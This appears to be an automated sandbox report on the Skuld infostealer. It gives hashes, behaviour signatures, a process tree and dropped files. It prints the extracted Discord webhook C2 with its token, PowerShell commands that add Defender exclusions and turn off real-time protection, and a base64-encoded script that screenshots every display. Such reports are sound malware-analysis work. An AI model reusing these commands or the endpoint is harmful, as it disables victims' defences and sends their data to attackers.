Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-06-2024 21:32

General

  • Target

    skuld.exe

  • Size

    9.5MB

  • MD5

    37681ae19279fec51c002e7f6907bced

  • SHA1

    d6dce788f74a5c827a84f7a28953dab34684ae29

  • SHA256

    cd4fffe44462f93456326d20ad8a22ea1be87c9ba1670fb7e2e414e5e7c1c83f

  • SHA512

    e80abbfd9d1ff49f90c097db2ad975d48df59b97ef922692e8b8adbac8629965008924064358b218e864b588c0d52e3c44245a08cc712f8c403b21180c1d8f30

  • SSDEEP

    98304:60fFH9tHce0xpD034tfgPSgqaWqjOEMCoEBTp6u:LT5cZxB1YSgqabjrMCL6u

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1254543345703977021/GGEp1kTIdcnrlXbkstceRTKYL1MjeavIS4CYW77UE3k75CymaXcXytUfkZVnLNW1d_wt

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\skuld.exe
    "C:\Users\Admin\AppData\Local\Temp\skuld.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\skuld.exe
      2⤵
      • Views/modifies file attributes
      PID:4892
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:2136
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4716
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious use of AdjustPrivilegeToken
      PID:4120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\skuld.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:772
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vg2to5mv\vg2to5mv.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4412
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A16.tmp" "c:\Users\Admin\AppData\Local\Temp\vg2to5mv\CSC7719FC7E64FF487DBD9BE53610FCDDA.TMP"
          4⤵
            PID:4440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1960
      • C:\Windows\system32\attrib.exe
        attrib -r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:2024
      • C:\Windows\system32\attrib.exe
        attrib +r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:1948
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff7d0aab58,0x7fff7d0aab68,0x7fff7d0aab78
        2⤵
          PID:880
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:2
          2⤵
            PID:4884
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:8
            2⤵
              PID:324
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:8
              2⤵
                PID:2608
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2940 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:1
                2⤵
                  PID:4564
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2948 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:1
                  2⤵
                    PID:2824
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4240 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:1
                    2⤵
                      PID:3708
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3976 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:8
                      2⤵
                        PID:1220
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4624 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:8
                        2⤵
                          PID:2756
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4508 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:8
                          2⤵
                            PID:2984
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4580 --field-trial-handle=1940,i,4072622569820558084,16422568203767682130,131072 /prefetch:8
                            2⤵
                              PID:3620
                          • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                            "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                            1⤵
                              PID:1676

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                              Filesize

                              264KB

                              MD5

                              f50f89a0a91564d0b8a211f8921aa7de

                              SHA1

                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                              SHA256

                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                              SHA512

                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\5aa4b85a-e733-44aa-841b-184344aa35c4.tmp

                              Filesize

                              1KB

                              MD5

                              1afcd20052ad711b1d4504e4729e6b6b

                              SHA1

                              aa73501bb715ebc64affbc20179e82ce829a0e30

                              SHA256

                              bf2f0ff2b45c122c820d5bc34188c7cdf199319b9115f1104de5d9705a3426d8

                              SHA512

                              37faf7273076b405dce3a82d8609492da3bb7b0535579c3680ea505e40eb639e18fe9cd5bf34ad7cea0b0fccb128bad302cc62bf3bc2f6f40dd946ce6405d434

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                              Filesize

                              2B

                              MD5

                              d751713988987e9331980363e24189ce

                              SHA1

                              97d170e1550eee4afc0af065b78cda302a97674c

                              SHA256

                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                              SHA512

                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                              Filesize

                              356B

                              MD5

                              ba57533c678770aab8de5f8b479fbc92

                              SHA1

                              b0bdf8760b75009d6d367f4bc5cf0d0f24b26bf1

                              SHA256

                              b882d6676cfd5f5c5afda66d2074082b8da5032ddd7ee3996c43d677a9145cc3

                              SHA512

                              461817cb57560d4d3ca6bf79c4bb5f8f3f763e1e6d70681126d11ba7b02164294d3f22c282a6b93f53e397a323795ccd267cd591d0579d1cae8c4391f40db55d

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                              Filesize

                              6KB

                              MD5

                              1813de2d2b9fdbda89c4c44d9f8fbc04

                              SHA1

                              1e231b2bdad103eb42099663cc8f55502e52d48e

                              SHA256

                              ad586eed408e3e8a8295774dfd5da527f1e7a428e785142b8d849c4854d493a7

                              SHA512

                              ee15697d28bfd514250c1adc3e850b8f3e9214c03cccf013da3e12fdd15694c3839273691b490ec4a0fd02be2ba987fc95e9893de30cc47900694479403e47be

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                              Filesize

                              16KB

                              MD5

                              ff01fa1045c5fdc2d2c6bd4d96e97bb3

                              SHA1

                              91d9bf37048c7495107dff5456de4f04f5919ab7

                              SHA256

                              8d43ca271857fa39c307c268965f335685166e239a3dcbcf9f270643e54e494c

                              SHA512

                              a9f664d59b3a8cae463cdb71554b50b0f549557c523c32f8e96ddaad35a4b0d3a7ccd2e62fbd39436ed5d4d779f4a741aa7ff6ca7cfc422af3d35948bdc7f461

                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                              Filesize

                              138KB

                              MD5

                              e7605709cb89a48c62e8a88b6cd0b689

                              SHA1

                              246d2f2d6e7c8a0d832e2ff3715abaa8dda98680

                              SHA256

                              2602c6e1d049d710a0d3dce44db7a733a6604d1c4ccea7fb5a7bb098a2f70a28

                              SHA512

                              4692da10e1b2ded119cde2812f8455a2d6f0012d12d15b7db3d8802831add60b2c38f6693a6451376098966306980afef95457d3862d06d23ffeb181608261d0

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              d85ba6ff808d9e5444a4b369f5bc2730

                              SHA1

                              31aa9d96590fff6981b315e0b391b575e4c0804a

                              SHA256

                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                              SHA512

                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              944B

                              MD5

                              77d622bb1a5b250869a3238b9bc1402b

                              SHA1

                              d47f4003c2554b9dfc4c16f22460b331886b191b

                              SHA256

                              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                              SHA512

                              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              944B

                              MD5

                              26403455115fbc3da2573a37cc28744a

                              SHA1

                              6a9bf407036a8b9d36313462c0257f53b4ee9170

                              SHA256

                              222a7adb94c5e82df6466a4afce283e905c69f7feb18b3e34583b5cbbd88b352

                              SHA512

                              be96d478e5d804b8daf805ad28d5eba644fb63a59a799273e029c8047a036f8aac74098efcadee0e4f405dcd1c0a689a1e8eb23f51a93634ed44f5a7c821beb6

                            • C:\Users\Admin\AppData\Local\Temp\RES5A16.tmp

                              Filesize

                              1KB

                              MD5

                              968da7cccc88900b0eb71106f3913c9c

                              SHA1

                              f948025f0b43ef4331fedd87e26dedbdc3b3cff6

                              SHA256

                              9e3687d32b1c4e8c196d5069eb9ef05940fb83142923d5a37b9a053de85bfce6

                              SHA512

                              aa4f9bd8ced6c08eb7e6c3d9d3e9108f35638283c3a02d911d443e854fae24cd2e549e28749a6a7177aa65580a9e02052fefa64b4bd268202ee101429a05888e

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4zbywtqi.2qp.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\vg2to5mv\vg2to5mv.dll

                              Filesize

                              4KB

                              MD5

                              d5763767fcf436fc0064ef1cf65e0959

                              SHA1

                              84ae3da8bff48cac6f89ee455b626d6d5a0a7908

                              SHA256

                              060aa5fbf82af8eb4e51a6f6c2b0e23cd30d7c464ab9c51de36c68d0f431afef

                              SHA512

                              95629cb6d7234a36fa61e04b7c040e271f2e32145a2d6741bc55f4ced610930affd85f3160a37695107b3037a794728448386ed3ddcfdd69331d7ae586d6bedf

                            • C:\Users\Admin\AppData\Local\Temp\ypzex3jqyz\Display (1).png

                              Filesize

                              408KB

                              MD5

                              734e6d692d3ef0dfdadbea05251cbe54

                              SHA1

                              520808515ce85e1a28f4fe3de4b76f5d511bb305

                              SHA256

                              d6b1d9675c1ce2ad800bdf9109859f67317b9aa9faf5b0c2fb3438c86d686430

                              SHA512

                              b09c594aeaf32e2bdce6afe217d391e993072a21e34c1a943168dd93c5e208b9ccd9f18f8d47b9bb83b1a20bf3ff442e0b3616f37aea10e659337104c69132f6

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                              Filesize

                              9.5MB

                              MD5

                              37681ae19279fec51c002e7f6907bced

                              SHA1

                              d6dce788f74a5c827a84f7a28953dab34684ae29

                              SHA256

                              cd4fffe44462f93456326d20ad8a22ea1be87c9ba1670fb7e2e414e5e7c1c83f

                              SHA512

                              e80abbfd9d1ff49f90c097db2ad975d48df59b97ef922692e8b8adbac8629965008924064358b218e864b588c0d52e3c44245a08cc712f8c403b21180c1d8f30

                            • C:\Windows\System32\drivers\etc\hosts

                              Filesize

                              2KB

                              MD5

                              6e2386469072b80f18d5722d07afdc0b

                              SHA1

                              032d13e364833d7276fcab8a5b2759e79182880f

                              SHA256

                              ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                              SHA512

                              e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                            • \??\c:\Users\Admin\AppData\Local\Temp\vg2to5mv\CSC7719FC7E64FF487DBD9BE53610FCDDA.TMP

                              Filesize

                              652B

                              MD5

                              e31b976474be5156448ccdb9302ec0f0

                              SHA1

                              cbaf26af4955c1a65c682cc5fbfa5f320aa44560

                              SHA256

                              d9944db4602fdce611a434e591e5bd5543c3f5604e42539d3bb8fe15586bd09f

                              SHA512

                              68cbdf3c7805e4d9eafb07b10f95eb57a8216c060988d3fb261b28cdb25709a9e26f874f447e145f9384479bec51b40ea6969fdcc91e2591d0b7064f6a1d0eb2

                            • \??\c:\Users\Admin\AppData\Local\Temp\vg2to5mv\vg2to5mv.0.cs

                              Filesize

                              1004B

                              MD5

                              c76055a0388b713a1eabe16130684dc3

                              SHA1

                              ee11e84cf41d8a43340f7102e17660072906c402

                              SHA256

                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                              SHA512

                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                            • \??\c:\Users\Admin\AppData\Local\Temp\vg2to5mv\vg2to5mv.cmdline

                              Filesize

                              607B

                              MD5

                              6cb4f7ed1784b269bcd0b6b7c50003db

                              SHA1

                              a6920d9cffacd5c5d3dc1e2b2779292449b11234

                              SHA256

                              38ff2aac6ca07c3d5c46597c28f10b72c5d5f1e81a2147463c5af6be45f05dca

                              SHA512

                              3577db27f98bc19d002b9158ed5ea9eb886b3fbafdb301d3efe2fc11a8878ecd60e890a9e05e449cd393c1289903aed8cba7c3ee3825254f6ed361b47cdfcb06

                            • memory/772-54-0x0000029275410000-0x0000029275418000-memory.dmp

                              Filesize

                              32KB

                            • memory/2316-12-0x0000021D36490000-0x0000021D364B2000-memory.dmp

                              Filesize

                              136KB